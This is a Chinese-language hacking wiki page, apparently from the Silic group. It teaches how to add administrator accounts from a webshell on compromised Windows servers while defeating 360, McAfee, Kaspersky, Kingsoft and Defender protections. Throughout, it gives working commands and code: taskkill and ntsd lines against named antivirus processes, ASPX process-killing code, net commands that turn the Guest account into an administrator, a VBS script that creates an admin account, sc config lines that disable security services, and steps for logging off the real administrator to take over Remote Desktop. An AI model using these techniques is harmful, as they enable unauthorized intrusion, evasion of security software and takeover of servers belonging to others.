习科小黑板 - Silic Wiki

很多习科会员在Windows下SYSTEM权限的webshell下添加账户，但却无法成功。SYSTEM权限肯定足够大，却无法成功，原因是什么呢？
提权不可能百分百成功。下面文章进行了多种分析，并附上一些突破绕过方法。

经常会在国内的一些服务器上遇到360杀毒和防护软件，如果使用webshell进行添加administrators账户时，360会阻止并提示管理员，导致添加失败。
利用360不能完美的支持Server系统的特性可以突破360的安全防护。

阻止Webshell添加账户的主要是360主动防御，只要结束了主动防御360杀毒就是摆设。

发现360无法完美支持Server系统是发现习科php大马被某个服务器管理员举报到360论坛上去了，说360查不出来，希望更新病毒库云云。
结果360工程师看了以后说更新360就能杀到了，网管说更新了以后还是杀不到；
然后工程师又说装什么什么的防护，网管说装了还是杀不到；
然后工程师就缩头乌龟了，可见360在server上面其实并不能完美运行。

先执行tasklist看一下进程列表，使用如下命令把360主动防御结束。

taskkill /im 进程名.exe /f

360相关进程如下：

360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe

这几个灭了，基本上360的阻碍就清除了，就可以添加账户了。

Windows下Apache+PHP的特殊性，导致很多php站的webshell有SYSTEM的权限，所以结束360简直易如反掌。
即使不是SYSTEM，也有办法的，例如ASPX，asp.net有个操纵进程的功能。

<aspx | > protected void kp_Click(object sender, EventArgs e) {

Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString()) 
{
  try
  {
    kp1.Kill();
    Response.Write("<script>alert('Killed');location.href='?'</" + "script>");
    ListBox1.Items.Clear();
  }
  catch (Exception x) 
  {
    Response.Write(x.Message.ToString());
    Response.End();
  }
}

} </aspx> asp.net的kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。

有些SYSYTEM权限却干不掉360，例如360tray.exe,360safe.exe，通常是因为管理员登陆以后运行了图形界面没关闭，系统执行taskkill不会成功。 执行query user查看在线用户列表后logoff id把在线管理员的id踢了，然后360有的进程就自己灭了，这种情况多出现在2008的server系统上。

可以通过Guest账户突破麦咖啡杀毒软件。

启用Guest账户，修改Guest用户的密码，添加Guest为administrators用户组。

经过测试，麦咖啡的防护进程很难结束，但是仍然可以绕过防护，cmd命令如下

net user guest /active:yes
#guest用户启用
net user guest silic!&11133
#改guest密码
net localgroup administrators guest /add
#加guest到管理员用户组中

这三条命令第二条或者第三条有时候可能不会显示命令执行成功，但是实际上只要是SYSTEM权限，就应该可以执行成功的，有无回显并不重要。

卡巴斯基的防护也是让人头疼的。关于突破卡巴斯基的方法，有很多。

• 最经典的是调整系统时间，让卡巴的key失效；
• 还有mkdir建立以非法字符“.”命名的文件夹，将pr等提权程序传进去。

SYSTEM突破卡巴的防御直接添加用户不太容易，但是可以尝试用taskkill & net user 账户 密码 /add命令，同时执行结束进程和添加账户。

此方法尚未实践，但是理论上是可以的，因为卡巴不像麦咖啡，卡巴斯基可以直接被结束掉，但是立即就会重启进程。

首先说KSafeSvc.exe, 从文件名就知道是金山的程序。

这个进程用taskkill是搞不定的…只要这个防护进程，net user /add的时候，就算net.exe改名了，它也会弹出是否阻止的窗口(可能是它弹的，就算不是它弹的，也要干掉他才能添加)

Windows还有个命令ntsd可以终结掉大部分进程，例如winlogon.exe,svchost.exe

ntsd -c q -p PID

ntsd可以结束KSafeSvc.exe

这个组合其实也很脆弱。

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","silic")
od.SetPassword "silic"
od.SetInfo
Set of=GetObject(os&"/silic",user)
oe.add os&"/silic"

脚本执行成功可添加用户名和密码均为silic的管理员账户

有时候mysql或者mssql等等提权的时候，会发生杀软无法结束，导致提权失败的情况。
将杀软服务设置为禁用重启服务器，杀毒防护服务就不能运行了。

sc config 服务名 start= disabled
sc config MsMpSvc start= disabled

如果无法结束服务，就直接从注册表删除该服务的启动。

很多非主流的防护软件，如护卫盾啊，Safe3防篡改等等，这些软件的突破方法和主流防护软件突破方法大致相同，结束进程，或者不使用添加账户，直接启用现有的Guest来突破监控，不赘述了

进行3389添加账户前首先要知道3389到底开启没有。目前添加账户后无法登陆的情况，只遇到过3389端口变更为其他端口的例子，没见过不开启远程桌面的例子。

找出端口方法再简单不过：netstat -an查看所有开启的端口，不过挨个查询可疑的端口太慢。
tasklist /svc查看TermService的服务进程PID，netstat -ano查看pid对应的端口即远程桌面的端口

远程桌面使用svchost.exe进程启用TermService服务开放端口

有些主机Webshell是System权限，tasklist也看不到任何防护的进程，管理员也没在线，提权程序也添加不了。

有果必有因，这样的情况添加不了，多数是系统有组策略限制，通常限制的是密码最短长度。而这个组策略又多数是麦咖啡等防护软件设置上的。或者干脆就是装机的系统本身就开启了这个设置。

突破方法只要在添加账户时把密码位数设置长一点就ok，原先密码是123456，现在改为1234abcd!@#$就过了
如果还是添加不上，可以尝试用vbs脚本来添加。

有些管理员直接把c:\windows\system32\net.exe给删了或替换了，直接net的时候会提示拒绝访问或者不是系统命令等等类似提示。
因为系统的net.exe没了，重新上传一个net.exe就突破了。

注意32位系统和64位系统的程序不兼容的情况。

有时候添加账户成功，但连接的时候提示最大连接数限制。管理员不在线，却占着线不让你上去，等管理员自己上线了可以把黑客的进程删了。

首先query user查看在线的账户，然后看他的登陆ID，一般是0，最高不超过8(超过8说明服务器好久没重启了)
然后logoff ID对应ID的管理员，就可以登陆了。

踢掉管理员命令logoff注意不要把自己logoff了，例如在system权限下的mysql中，只执行logoff不带任何id，就会使用使mysql失去system权限 —_—

暂无